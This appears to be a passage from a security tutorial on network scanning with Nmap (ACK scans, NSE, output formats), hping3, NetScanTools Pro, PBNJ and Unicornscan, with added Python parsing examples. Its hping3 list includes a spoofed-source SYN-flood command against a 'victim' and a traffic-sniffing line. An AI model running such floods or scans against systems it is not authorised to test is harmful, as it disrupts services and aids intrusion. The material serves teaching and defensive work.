ACK flag scanning is another stealthy technique: the attacker sends TCP packets with only the ACK flag set, as if they belonged to an already established connection. A host that receives such a segment on a port for which it holds no connection replies with RST, whether the port is open or closed (RFC 793). The scan therefore does not find open ports; it maps firewall rules. If a RST comes back, the port is unfiltered (a packet filter let the probe through). If nothing comes back, or an ICMP unreachable error arrives, a stateful firewall or packet filter dropped the probe because it belonged to no known connection, and Nmap (-sA) reports the port as filtered. A plain ACK packet also slips past simple stateless filters that only block incoming SYNs.

Two fields in the RST replies can be examined to squeeze more information out of an ACK scan:

- TTL field analysis: compare the TTL values of the RST packets returned for different ports. On some older stacks the RST for an open port carries a lower TTL than those for closed ports (the classic rule compares it against the boundary value 64).
- WINDOW field analysis: on some stacks the RST for an open port carries a non-zero window size while closed ports return a window of zero. Nmap implements this as the window scan (-sW).

Both tricks depend on implementation quirks of a minority of TCP/IP stacks and give no useful result on most modern systems; treat "no difference between ports" as inconclusive, not as "all closed".

[Figure: ACK flag probe with no firewall. The attacker sends a probe packet (ACK) to the target host; the target replies RST.]

[Figure: ACK flag probe with a stateful firewall present. The attacker sends a probe packet (ACK); the firewall drops it and there is no response.]
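The inverse flag scans and the ACK scan above differ only in what the target (or a firewall in front of it) sends back. The Python model below is an added example, not code from the original text or from Nmap: it encodes the RFC 793 responses described above, a Windows-style stack that answers RST/ACK to every out-of-state probe, and a stateful firewall that drops anything but a SYN, then applies Nmap's interpretation for -sF, -sX, -sN and -sA. The port numbers and the names target_reply, interpret and scan are constructed for the example.

```python
"""How a target answers inverse-flag (FIN/XMAS/NULL) and ACK probes, and how Nmap
reads the answers.

Added example, not code from the original text. It models two constructed target
stacks, one following RFC 793 and a Windows-style one that answers RST/ACK to every
out-of-state probe, plus an optional stateful firewall in front of the host, and
applies Nmap's interpretation for -sF/-sX/-sN and -sA. Nothing is sent on the wire.
"""
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

PROBES = {
    "FIN":  FIN,                # -sF
    "XMAS": FIN | PSH | URG,    # -sX
    "NULL": 0,                  # -sN
    "ACK":  ACK,                # -sA
}


def target_reply(flags, port_open, stack="rfc793", stateful_firewall=False):
    """Flags of the reply segment, or None when the probe draws no answer."""
    if stateful_firewall and flags != SYN:
        # The firewall has no connection entry for this segment and only a SYN could
        # create one, so every other probe is dropped without a reply.
        return None
    if flags & ACK:
        # RFC 793: an unsolicited ACK is answered with RST by open and closed ports alike.
        return RST
    if flags & SYN:
        return SYN | ACK if port_open else RST | ACK
    # FIN/XMAS/NULL probe. RFC 793: a closed port answers RST/ACK, an open port
    # drops the segment. The Windows stack answers RST/ACK whatever the port state.
    if stack == "windows" or not port_open:
        return RST | ACK
    return None


def interpret(probe_name, reply):
    """Port state Nmap reports for this probe type and reply."""
    if probe_name == "ACK":
        return "unfiltered" if reply is not None and reply & RST else "filtered"
    if reply is None:
        return "open|filtered"      # silence: open, or a filter ate the probe
    if reply & RST:
        return "closed"
    return "open"


def scan(probe_name, ports, open_ports, **target):
    """Run one probe type against every port of a modelled target."""
    flags = PROBES[probe_name]
    return {p: interpret(probe_name, target_reply(flags, p in open_ports, **target))
            for p in ports}


if __name__ == "__main__":
    ports, open_ports = [22, 80, 443], {22, 80}
    print("FIN  vs RFC 793 host:   ", scan("FIN", ports, open_ports))
    print("XMAS vs Windows host:   ", scan("XMAS", ports, open_ports, stack="windows"))
    print("ACK  no firewall:       ", scan("ACK", ports, open_ports))
    print("ACK  stateful firewall: ", scan("ACK", ports, open_ports, stateful_firewall=True))
```

Running it shows the two caveats from the text in one place: against the Windows-style stack every port of an XMAS scan comes back "closed", and behind a stateful firewall every port of an ACK scan comes back "filtered" because the probe never reaches the host.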



The Nmap Scripting Engine (NSE): From Caterpillar to Butterfly

Nmap began as a port scanner; NSE is the feature that turned it into a far more flexible tool. The Nmap Scripting Engine lets users write (and share) simple scripts that automate a wide variety of networking tasks, and Nmap runs them in parallel with the speed and efficiency of its scanning engine. NSE scripts extend the basic output with advanced version detection, vulnerability detection, detection of backdoors and malware, in some cases exploitation of a vulnerability, and discovery tasks such as whois lookups, SNMP queries and NetBIOS/SMB enumeration. Scripts are written in the Lua language. Writing your own script is not hard, but read a script and understand what it does before running it against a system you are responsible for, because some categories can crash services or alter the target.

NSE groups scripts into categories: auth, broadcast, brute, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version and vuln. The "safe" category contains scripts that do not affect the target or consume much bandwidth; "intrusive", "dos" and "exploit" scripts can. The scripts installed with Nmap are documented at:

http://nmap.org/nsedoc

On Linux you can find the installed NSE scripts with [locate *.nse].

To run a script, pass its name (or a comma-separated list of names) to --script, as in this example:

#nmap --script banner 192.168.18.132

The "banner" script connects to every open TCP port Nmap finds, reads what the service sends, and prints that banner, which often reveals the product and its version.

You can also run a whole category with [--script <category name>]. For example, --script vuln runs the scripts that test for specific known vulnerabilities and reports them only when they are found. These scripts focus on detecting weaknesses rather than exploiting them, but several of them are intrusive, so use the category with care on production systems.

Whenever you add or update scripts, rebuild the script database so that Nmap can find them by name and category:

#nmap --script-updatedb
Port Scanning Wrap Up (some additional options)

A few more Nmap options worth knowing before moving on:

1. Version scanning (-sV)
As mentioned earlier, -sV turns on version detection. Nmap connects to each open port, sends protocol probes, matches the replies against its signature database to identify the service and its version, and flags anything it cannot identify. Version detection also shows which service is really running on a port; a web server hidden on port 34567, for example, is reported as http rather than as an unknown service. The price is a slower and noisier scan, because -sV exchanges real application data with every open port.

2. Timing templates (-T)
Nmap offers six timing templates, selected with -T followed by a number from 0 to 5 (or a name): paranoid (0), sneaky (1), polite (2), normal (3), aggressive (4) and insane (5). The lower templates send packets slowly, which reduces the chance of tripping an IDS and the load on the network, but make the scan take much longer. The higher templates finish faster but can miss ports or overload a slow link. Choose a template that suits the network and the amount of stealth you need; the default is -T3 (normal).

3. Fingerprinting the operating system (-O)
The -O option asks Nmap to guess the target's operating system by sending a series of TCP/IP probes and comparing the responses with its fingerprint database. Knowing the operating system tells you which vulnerabilities and exploits may apply and helps to explain odd port-scan results. OS detection works best when Nmap finds at least one open and one closed TCP port on the target; without both, the guess is unreliable.

4. Selecting ports (-p)
Use -p to choose which ports to scan: a single port, a comma-separated list, or ranges. "-p-" scans all 65,535 ports. A few examples:

#nmap -sS -p 1-100

#nmap -sU -p 53,137,138,161,162

#nmap -sS -p 1-100,445,8000-9000
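The -p syntax above is worth parsing correctly when you build scan wrappers or compare the port list you asked for with what a scan actually covered. The parser below is an added example, not Nmap's own code: it follows Nmap's rules for comma-separated items, "lo-hi" ranges with either end optional, "-" for all ports, and the T:/U: prefixes that select a protocol for the item and the items that follow it. One assumption is marked in the code: items with no prefix are applied to both protocols here, whereas Nmap applies them to whichever scan types are active.

```python
"""Parser for Nmap's -p port specification.

Added example, not Nmap's own code. It turns strings such as "1-100,445,8000-9000",
"-" (all ports) or "T:22,80,U:53,161-162" into the TCP and UDP port sets they denote,
following Nmap's rules: items are comma-separated, a range is lo-hi with either end
optional, and a T: or U: prefix applies to that item and to the items that follow it
until the next prefix. Items without a prefix are applied to both protocols here
(an assumption for this example; Nmap applies them to whichever scan types are active).
"""


def parse_port_spec(spec):
    result = {"tcp": set(), "udp": set()}
    protos = ["tcp", "udp"]             # no prefix seen yet: both protocols
    for item in spec.split(","):
        item = item.strip()
        if not item:
            raise ValueError("empty item in port specification")
        if item[:2].upper() == "T:":
            protos, item = ["tcp"], item[2:]
        elif item[:2].upper() == "U:":
            protos, item = ["udp"], item[2:]
        if "-" in item:                 # "-", "lo-", "-hi" or "lo-hi"
            lo_text, hi_text = item.split("-", 1)
            lo = int(lo_text) if lo_text else 1
            hi = int(hi_text) if hi_text else 65535
        else:
            lo = hi = int(item)
        if not 0 <= lo <= hi <= 65535:
            raise ValueError(f"bad port range: {item!r}")
        for proto in protos:
            result[proto].update(range(lo, hi + 1))
    return result


if __name__ == "__main__":
    for spec in ("1-100,445,8000-9000", "53,137,138,161,162", "T:22,80,U:53,161-162", "-"):
        parsed = parse_port_spec(spec)
        print(f"{spec:28s} tcp={len(parsed['tcp']):5d} udp={len(parsed['udp']):5d}")
```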



5. Output options
[-oN Normal Output]
Writes the results to a text file in the same format you see on screen:

#nmap -oN metascan.txt 10.0.2.100

[-oX (XML) Output]
Writes the results as XML, the format to use when the scan output will be parsed by other programs or imported into another tool:

#nmap -oX metascan.xml 10.0.2.100

[-oG GREPable Output]
Writes the results with one host per line, a format meant for processing with text tools such as grep, awk, sed and diff:

#nmap -oG metascan.txt 10.0.2.100

[-oS Script Kiddie Output]
A joke format that rewrites the output in "leet speak"; it has no use in real reports:

#nmap -oS metascan.txt 10.0.2.100
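The point of -oX and -oG is that other programs can read them, so here is what reading them looks like. The two parsers below are an added example, not Nmap's code; the XML and grepable samples they work on are constructed to resemble the output of a scan of 10.0.2.100 and are not real scan results. Both parsers produce the same record shape so that a result set from either format can be compared or passed on to another tool.

```python
"""Parsers for Nmap's -oX (XML) and -oG (grepable) output.

Added example, not Nmap's own code. The two samples below are constructed to look
like the output of "nmap -sS -sV -oX/-oG ... 10.0.2.100"; they are not real scan
results. Both parsers return the same record shape so that results from either
format can be compared or fed to other tools, which is what these formats are for.
"""
import xml.etree.ElementTree as ET

SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -sV -oX metascan.xml 10.0.2.100" start="1395648008">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="10.0.2.100" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="6.0p1"/></port>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.2.22"/></port>
      <port protocol="tcp" portid="445"><state state="filtered" reason="no-response"/></port>
    </ports>
  </host>
</nmaprun>
"""

SAMPLE_GREPABLE = (
    "Host: 10.0.2.100 ()\tPorts: 22/open/tcp//ssh//OpenSSH 6.0p1/, "
    "80/open/tcp//http//Apache httpd 2.2.22/, 445/filtered/tcp//microsoft-ds///"
    "\tIgnored State: closed (997)\n"
)


def parse_nmap_xml(xml_text):
    """One record per <port> of every host that is up."""
    records = []
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        addr = host.find("address[@addrtype='ipv4']")
        if status is None or status.get("state") != "up" or addr is None:
            continue
        for port in host.iter("port"):
            state, svc = port.find("state"), port.find("service")
            product = None
            if svc is not None and svc.get("product"):
                product = " ".join(filter(None, (svc.get("product"), svc.get("version"))))
            records.append({"ip": addr.get("addr"), "proto": port.get("protocol"),
                            "port": int(port.get("portid")), "state": state.get("state"),
                            "reason": state.get("reason"),
                            "service": svc.get("name") if svc is not None else None,
                            "product": product})
    return records


def parse_grepable(text):
    """One record per port entry of every 'Host:' line that carries a 'Ports:' field.
    Each entry has the form port/state/proto/owner/service/rpc-info/version/."""
    records = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        ip = line.split()[1]
        ports_field = line.split("Ports: ", 1)[1].split("\t", 1)[0]
        for entry in ports_field.split(", "):
            f = entry.split("/")
            records.append({"ip": ip, "proto": f[2], "port": int(f[0]), "state": f[1],
                            "reason": None, "service": f[4] or None, "product": f[6] or None})
    return records


def open_ports(records):
    """Sorted (ip, proto, port) tuples for the ports reported open."""
    return sorted((r["ip"], r["proto"], r["port"]) for r in records if r["state"] == "open")


if __name__ == "__main__":
    print(open_ports(parse_nmap_xml(SAMPLE_XML)))
    print(open_ports(parse_grepable(SAMPLE_GREPABLE)))
```

The XML carries the "reason" for each state (syn-ack, no-response and so on), which the grepable format drops; when you need to know why a port was called filtered, parse the XML.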



SCANNING TOOL: HPING2/HPING3

Source: http://www.hping.org

Hping2/Hping3 is a command-line TCP/IP packet assembler and analyser. Its interface is modelled on the ping command, but it is not limited to ICMP echo requests: it can send TCP, UDP, ICMP and raw IP packets with any header fields you choose, displays the replies the same way ping does, and has a traceroute mode. This makes it useful for testing firewall rules, for port scanning with hand-crafted packets, and for moving files over a covert channel. The main uses of the tool are:

- Firewall testing
- Advanced port scanning
- Network testing using different protocols, TOS (Type of Service) values and fragmentation
- Manual path MTU discovery (MTU = maximum transmission unit)
- Advanced traceroute under all the supported protocols
- Remote OS fingerprinting
- TCP/IP stack auditing

Example of Hping2/Hping3 use:

#hping3 172.16.0.10 -S -c 1 -p 22

-S sets the SYN flag on the packets sent.
-c 1 sends one packet only (by default hping keeps sending until it is interrupted).
-p 22 sets the destination port to 22.

Common hping3 commands:

Scan: ICMP ping
Command: hping3 -1 10.0.0.25

Scan: ACK scan on port 80
Command: hping3 -A 10.0.0.25 -p 80

Scan: UDP scan on port 80
Command: hping3 -2 10.0.0.25 -p 80

Scan: Collecting initial sequence numbers
Command: hping3 192.168.1.103 -Q -p 139 -s

Scan: Firewalls and time stamps
Command: hping3 -S 72.14.207.99 -p 80 --tcp-timestamp

Scan: SYN scan on ports 50-60
Command: hping3 -8 50-60 -S 10.0.0.25 -V

Scan: FIN, PUSH and URG scan on port 80
Command: hping3 -F -P -U 10.0.0.25 -p 80

Scan: Scan an entire subnet for live hosts
Command: hping3 -1 10.0.1.x --rand-dest -I eth0

Scan: Intercept all traffic containing an HTTP signature
Command: hping3 -9 HTTP -I eth0

Scan: SYN flooding a victim
Command: hping3 -S 192.168.1.1 -a 192.168.1.254 -p 22 --flood
SCANNING TOOL: NETSCAN TOOLS PRO

Source: http://www.netscantools.com

NetScan Tools Pro is a collection of network investigation tools for Windows that helps you discover, troubleshoot, monitor and document the devices on an IPv4/IPv6 network. With it you can find the hosts on a LAN, list their open ports and services, query DNS, trace routes, gather information about IP addresses and domains, and save the results for reports. The tools are arranged in four groups:

1. Active Discovery and Diagnostic Tools: tools that send packets to the target devices (ping, traceroute, port scanner, ARP scan and so on) and record their responses.
2. Passive Discovery Tools: tools that only listen to the traffic on your network and report what they see, together with tools that gather information from third-party sources.
3. DNS Tools: tools for querying and troubleshooting DNS.
4. Local Computer and General Information Tools: tools that report on the local machine and its network settings.

In NetScan Tools Pro, network scanning means probing a range of addresses to find the active hosts and then gathering information about each one: open ports, running services, shares and so on.
Among its scan-related functions, NetScan Tools Pro provides:
- Monitoring of the network and of individual hosts.
- Notifications: discovery of IP addresses, MAC addresses, and the services/ports running on each host.

Using the program (the screenshots below are from the NetScanTools Pro Demo Version, build 11-7-2013 based on version 11.53):

1. Start the program. The first-run wizard can be dismissed, after which the main window appears. The left panel groups the tools (Automated Tools, Manual Tools, Favorite Tools, Active Discovery Tools, Passive Discovery Tools, Packet Level Tools, External Tools, Program Info). The welcome screen explains the demo limitations (results cannot be saved to a text file, the History Database does not retain data between sessions, and the source IP in the Packet Generator must be your interface IP) and the icon colours: red icon tools contact the target, green icon tools listen to network traffic, blue icon tools work with your local system, and gray icon tools contact third-party systems. Press F1 for the local help, which includes getting-started information.

[Screenshot: NetScanTools Pro welcome window.]
2. Choose Manual Tools, then ARP Ping. Before using a tool, read the "A few words about this tool..." panel that opens with it. For ARP Ping it says:

About the ARP Ping Tool
Use this tool to 'PING' an IPv4 address on your subnet using ARP packets. Use it on your LAN to find the response time of a device to an ARP_REQUEST packet even if the device is hidden and does not respond to regular Ping. ARP Ping requires a target IPv4 address on your LAN, because ARP packets cannot be routed. Don't miss this special feature in this tool: identify duplicate IPv4 addresses by 'pinging' a specific IPv4 address; if more than one device (two or more MAC addresses) responds, you are shown the MAC address of each of the devices. Press Show Timing Chart to see a printable chart of ARP ping number vs time. Don't forget to right click in the results for a menu with more options. Demo limitations: none.

Press OK to close the panel.
3. Select "Send Broadcast ARP, then Unicast ARP", enter the address of the target in Target IPv4 Address (192.168.16.71 in the example, probed from the WinPcap interface 192.168.16.70), set Number to Send and Cycle Time (ms) if you wish, and press Send Arp. The result table lists, for each reply, the IP address, the MAC address that answered, the response time in milliseconds and whether the reply came to a broadcast or a unicast request. In the example all thirteen replies (one Broadcast followed by twelve Unicast, response times between 0.0026 and 0.0041 ms) carried the same MAC address (00-30-67-0F-AF-...), so the address is not duplicated. The option "Search for Duplicate IP Addresses" and the "Jump To Duplicate IP Scanner" button run that check explicitly.

[Screenshot: Manual Tools - ARP Ping with the result table for 192.168.16.71.]
4. Click ARP Scan (MAC Scan). Its description panel reads:

About the ARP Scan Tool
Use this tool to send an ARP Request to every IPv4 address on your LAN. IPv4 connected devices cannot hide from ARP packets and must respond with their IP and MAC addresses. Uncheck the Resolve IPs box for faster scan completion time. Don't forget to right click in the results for a menu with more options. Demo limitations: none.

Press OK to close it.

5. Enter the range to scan in Starting IPv4 Address and Ending IPv4 Address and press Do Arp Scan. Every device in the range that is on your LAN answers with its MAC address, which is why an ARP scan finds hosts that a ping sweep misses.

[Screenshot: Manual Tools - ARP Scan (MAC Scan) window.]
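The ARP Ping and ARP Scan tools above work because every host on the segment must answer an ARP request for its own address, and the duplicate-address check simply counts how many different MACs answer for one IP. The Python below is an added example, not NetScanTools code: it builds the Ethernet/ARP request frame by hand (RFC 826), decodes replies, and lists the MAC addresses that claimed the probed IP. The replies are constructed in memory, since sending real frames needs a raw socket or WinPcap, and all MAC addresses in it are made up.

```python
"""Building the frame an ARP ping sends, parsing the replies, and spotting a
duplicate IPv4 address.

Added example, not NetScanTools code. It encodes Ethernet/ARP frames by hand (RFC 826),
decodes replies, and reports every MAC address that answered for one probed IP, which
is the duplicate-address check described above. The replies are constructed in memory;
putting frames on the wire would need a raw socket or WinPcap, which this example avoids.
MAC addresses are made up for the example.
"""
import socket
import struct

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST_MAC = "FF-FF-FF-FF-FF-FF"
ZERO_MAC = "00-00-00-00-00-00"


def mac_bytes(text):
    return bytes.fromhex(text.replace("-", "").replace(":", ""))


def mac_text(raw):
    return "-".join(f"{b:02X}" for b in raw)


def build_arp(op, sender_mac, sender_ip, target_ip, target_mac=None):
    """Ethernet II frame carrying an ARP packet. A request is broadcast with an
    all-zero target MAC; a reply is unicast to the requester's MAC."""
    eth_dst = BROADCAST_MAC if target_mac is None else target_mac
    eth = struct.pack("!6s6sH", mac_bytes(eth_dst), mac_bytes(sender_mac), ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s",
                      1, 0x0800, 6, 4, op,          # Ethernet, IPv4, hw len 6, proto len 4
                      mac_bytes(sender_mac), socket.inet_aton(sender_ip),
                      mac_bytes(target_mac or ZERO_MAC), socket.inet_aton(target_ip))
    return eth + arp


def parse_arp(frame):
    """Decode an ARP-over-Ethernet/IPv4 frame into a dict, or return None."""
    if len(frame) < 42:
        return None
    _dst, _src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"op": op, "sender_mac": mac_text(sha), "sender_ip": socket.inet_ntoa(spa),
            "target_mac": mac_text(tha), "target_ip": socket.inet_ntoa(tpa)}


def responders(frames, probed_ip):
    """Sorted list of MAC addresses that replied for probed_ip. One entry is the normal
    case; two or more means the address is in use by more than one device."""
    macs = set()
    for frame in frames:
        arp = parse_arp(frame)
        if arp and arp["op"] == ARP_REPLY and arp["sender_ip"] == probed_ip:
            macs.add(arp["sender_mac"])
    return sorted(macs)


if __name__ == "__main__":
    me_mac, me_ip, probed = "00-1E-EC-AF-FE-65", "192.168.16.70", "192.168.16.71"
    request = build_arp(ARP_REQUEST, me_mac, me_ip, probed)
    # Constructed replies: the same host answering twice, plus a second device
    # claiming the same address (a duplicate IP).
    replies = [build_arp(ARP_REPLY, "00-30-67-0F-AF-01", probed, me_ip, me_mac),
               build_arp(ARP_REPLY, "00-30-67-0F-AF-01", probed, me_ip, me_mac),
               build_arp(ARP_REPLY, "00-11-22-33-44-55", probed, me_ip, me_mac)]
    print(parse_arp(request))
    print("responders for", probed, "=", responders(replies, probed))
```

To put the request on the wire you would open a raw (AF_PACKET) socket on Linux or use WinPcap/Npcap on Windows, which is what NetScanTools does through its "WinPcap Interface IP" setting; the frame bytes are the same.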
6. Click DHCP Server Discovery. Its description panel reads:

About the DHCP Server Discovery Tool
Use this tool to actively locate DHCP servers (IPv4 only) on your local network. It shows the IP address and other settings that are being handed out by DHCP servers. This tool can also find unknown or 'rogue' DHCP servers. Don't forget to right click in the results for a menu with more options. Demo limitations: none.

Press OK to close it.

7. Select your network interface in the interface list (double-click it, or single-click it and press Discover DHCP Servers), set the Wait Time in seconds (5 by default), and the tool broadcasts a DHCP discover on that interface. The Discover Options let you ask the servers for the hostname, subnet mask, domain name, DNS IP, router IP and NTP servers. Every DHCP server that answers is listed under Responding DHCP Servers with its IP, hostname, MAC address, the IP it offered and the offered subnet. In the example the interface 192.168.16.70 (Realtek PCIe GBE Family Controller; the virtual, TAP and Bluetooth adapters in the list had no address) received one offer: server 192.168.16.1 offered 192.168.16.73 with subnet mask 255.255.255.0. A second, unexpected server in this list is the sign of a rogue DHCP server.

[Screenshot: Manual Tools - DHCP Server Discovery window with the interface list and one responding server.]
8. Click Port Scanner, read its description panel, and press OK.

9. Enter the hostname or IP address of the target in Target Hostname or IP Address, choose the scan mode (TCP Full Connect, UDP Ports Only, TCP Full+UDP Ports, TCP SYN Scan (Half Open), or TCP Custom Scan), set the Start and End of the port range (or use Scan Common Ports with the editable common ports list), optionally tick "Show All Scanned Ports, Active or Not", set the Connect Timeout (2000 ms in the example), and press Scan Range of Ports. In the example a TCP Full Connect scan of ports 1-256 on www.google.com finished in 5 seconds. The TCP Full Connect Response Summary reported 2 active TCP ports, 0 active TCP ports returning data, 0 TCP ports rejecting the connection and 254 ports with no response (timeout), and the result table showed 173.194.40.116 with port 25 (smtp) and port 80 (http) active. A full-connect scan completes the three-way handshake with every port it finds, so it is reliable but easily logged by the target; the SYN (half open) mode is the quieter alternative.

[Screenshot: Manual Tools - Port Scanner window with the www.google.com results.]
SCANNING TOOL: PBNJ

PBNJ is a suite of tools that runs Nmap scans and stores the results in a database (MySQL, PostgreSQL or SQLite), so that scans taken at different times can be compared to see what has changed on a network: new hosts, new or closed ports, and changed services. In this example the results are stored in MySQL, so start MySQL first and log in as root:

root@jana:~# service mysql start
[ ok ] Starting MySQL database server: mysqld ..
[info] Checking for tables which need an upgrade, are corrupt or were not closed cleanly..
root@jana:~# mysql -u root
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 37
Server version: 5.5.28-1 (Debian)

Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

Now create the database that PBNJ will use with CREATE DATABASE and leave the MySQL client:

mysql> CREATE DATABASE pbnj;
Query OK, 1 row affected (0.00 sec)

mysql> exit
Bye

Next install PBNJ with [apt-get install pbnj] and create its configuration file. PBNJ reads config.yaml from the directory .pbnj-2.0 in your home directory; copy the MySQL example that ships with the package and edit it:

root@jana:/# mkdir -p /root/.pbnj-2.0
root@jana:/# cd /root/.pbnj-2.0
root@jana:~/.pbnj-2.0# cp /usr/share/doc/pbnj/examples/mysql.yaml config.yaml
root@jana:~/.pbnj-2.0# nano config.yaml

# YAML:1.0
# Config for connecting to a DBI database
# SQLite, mysql etc
db: mysql

# for SQLite the name of the file. For mysql the name of the database
database: pbnj

# Username for the database. For SQLite no username is needed.
user: root

# Password for the database. For SQLite no password is needed.
passwd: ""

# Host for the database. For SQLite no host is needed.
host: localhost

# Port for the database. For SQLite no port is needed.
port: 3306

(The example config connects as root with an empty password; on anything other than a throw-away lab machine create a dedicated database user for PBNJ.)

Now run a ping sweep with scanpbnj. The -a option passes extra arguments to Nmap; here it asks for a ping scan only (-sP) of four addresses:

root@jana:~/.pbnj-2.0# scanpbnj -a "-sP" 74.125.132.100-103
Starting Scan of 74.125.132.100
Inserting Machine
Scan Complete for 74.125.132.100
Starting Scan of 74.125.132.103
Inserting Machine
Scan Complete for 74.125.132.103
Starting Scan of 74.125.132.101
Inserting Machine
Scan Complete for 74.125.132.101
Starting Scan of 74.125.132.102
Inserting Machine
Scan Complete for 74.125.132.102
root@jana:~/.pbnj-2.0#

(Before the scan output, scanpbnj prints a Perl warning that Shell will be removed from the Perl core distribution in the next major release and that the separate libshell-perl package should be installed; it refers to /usr/bin/scanpbnj line 26 and can be ignored.)

To look at what scanpbnj stored, log into MySQL again with [mysql -u root], select the PBNJ database with the use command, and list its tables with show tables:

mysql> use pbnj;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;

Then query the tables with [select * from table_name]:

mysql> select * from services;
Empty set (0.00 sec)

mysql> select * from machines;
+-----+----------------+----------------------+--------+------------+-----------------+--------------------------+
| mid | ip             | host                 | localh | os         | machine_created | created_on               |
+-----+----------------+----------------------+--------+------------+-----------------+--------------------------+
|   1 | 74.125.132.100 | wb-in-f100.1e100.net |      0 | unknown os |      1395648008 | Mon Mar 24 04:00:08 2014 |
|   2 | 74.125.132.103 | wb-in-f103.1e100.net |      0 | unknown os |      1395648008 | Mon Mar 24 04:00:08 2014 |
|   3 | 74.125.132.101 | wb-in-f101.1e100.net |      0 | unknown os |      1395648008 | Mon Mar 24 04:00:08 2014 |
|   4 | 74.125.132.102 | wb-in-f102.1e100.net |      0 | unknown os |      1395648008 | Mon Mar 24 04:00:08 2014 |
+-----+----------------+----------------------+--------+------------+-----------------+--------------------------+
4 rows in set (0.00 sec)

The services table is empty because a ping scan (-sP) only checks whether the hosts are up. Run scanpbnj without "-sP" (or with the port-scan arguments you want) and the open ports, with the banners Nmap collects from them, are stored in services. Each run adds to the database rather than overwriting it, which is what makes later comparison possible. See the man pages of scanpbnj and outputpbnj for the remaining options, including how to report the differences between scans.
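What PBNJ adds over a plain scan is the comparison between runs. The Python below is an added example, not PBNJ's code: it keeps a machines/services schema modelled on the tables shown above in SQLite (from the standard library, in place of MySQL) and returns the ports that opened or stopped being open since the previous snapshot of the same host. The two "scans" it stores are constructed data, not real results, and the function names record_scan and current_open_ports are made up for the example.

```python
"""Storing scan results over time and reporting what changed.

Added example, not PBNJ's code. It uses SQLite from the Python standard library
in place of PBNJ's MySQL tables, with a schema modelled on the machines/services
tables shown above, and returns the ports that opened or closed since the previous
scan of the same host. The two "scans" are constructed data, not real results.
"""
import sqlite3
import time

SCHEMA = """
CREATE TABLE IF NOT EXISTS machines (
    mid INTEGER PRIMARY KEY, ip TEXT UNIQUE, host TEXT, os TEXT, created_on INTEGER);
CREATE TABLE IF NOT EXISTS services (
    sid INTEGER PRIMARY KEY, mid INTEGER REFERENCES machines(mid),
    port INTEGER, protocol TEXT, service TEXT, state TEXT, updated_on INTEGER);
"""


def open_db(path=":memory:"):
    con = sqlite3.connect(path)
    con.executescript(SCHEMA)
    return con


def record_scan(con, ip, observed, host=None, os_name="unknown os", now=None):
    """observed: iterable of (port, protocol, service, state) for one host.
    Stores the new snapshot and returns (opened, closed): sets of (port, protocol)
    that became open, or stopped being open, since the previous snapshot."""
    observed = list(observed)
    now = int(time.time() if now is None else now)
    con.execute("INSERT OR IGNORE INTO machines(ip, host, os, created_on) VALUES (?,?,?,?)",
                (ip, host, os_name, now))
    mid = con.execute("SELECT mid FROM machines WHERE ip = ?", (ip,)).fetchone()[0]
    before = {(port, proto): state for port, proto, state in
              con.execute("SELECT port, protocol, state FROM services WHERE mid = ?", (mid,))}
    after = {(port, proto): state for port, proto, _svc, state in observed}
    opened = {k for k, s in after.items() if s == "open" and before.get(k) != "open"}
    closed = {k for k, s in before.items() if s == "open" and after.get(k) != "open"}
    # Replace the host's snapshot; a production store would keep history per scan.
    con.execute("DELETE FROM services WHERE mid = ?", (mid,))
    con.executemany(
        "INSERT INTO services(mid, port, protocol, service, state, updated_on) VALUES (?,?,?,?,?,?)",
        [(mid, port, proto, svc, state, now) for port, proto, svc, state in observed])
    con.commit()
    return opened, closed


def current_open_ports(con, ip):
    rows = con.execute("SELECT s.port, s.protocol FROM services s JOIN machines m ON s.mid = m.mid "
                       "WHERE m.ip = ? AND s.state = 'open' ORDER BY s.port", (ip,))
    return [tuple(r) for r in rows]


if __name__ == "__main__":
    con = open_db()
    ip = "74.125.132.100"
    day1 = [(22, "tcp", "ssh", "open"), (80, "tcp", "http", "open")]
    day2 = [(22, "tcp", "ssh", "open"), (80, "tcp", "http", "closed"), (3306, "tcp", "mysql", "open")]
    print("day 1:", record_scan(con, ip, day1, host="wb-in-f100.1e100.net", now=1395648008))
    print("day 2:", record_scan(con, ip, day2, now=1395734408))
    print("open now:", current_open_ports(con, ip))
```

A port that disappears from the snapshot (not scanned at all the second time) is reported as closed here; if you scan different port ranges on different days, filter the comparison to the ports both scans covered, or the report fills with false "closed" entries.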



SCANNING TOOL: UNICORNSCAN

Unicornscan is a port scanner built on a user-land distributed TCP/IP stack: instead of relying on the operating system's stack it sends and receives packets itself, which is what makes it so fast. It was designed to give a researcher a flexible, efficient and accurate way of stimulating TCP/IP devices and networks and measuring how they respond. Its main features are:

- Asynchronous stateless TCP scanning with all variations of TCP flags (TCP port scanning)
- Asynchronous stateless TCP banner grabbing
- Asynchronous protocol-specific UDP scanning (UDP port scanning)
- Active and passive remote OS, application and component identification by analysing the responses
- PCAP file logging and filtering
- Relational database output
- Custom module support
- Customized data set views of the results

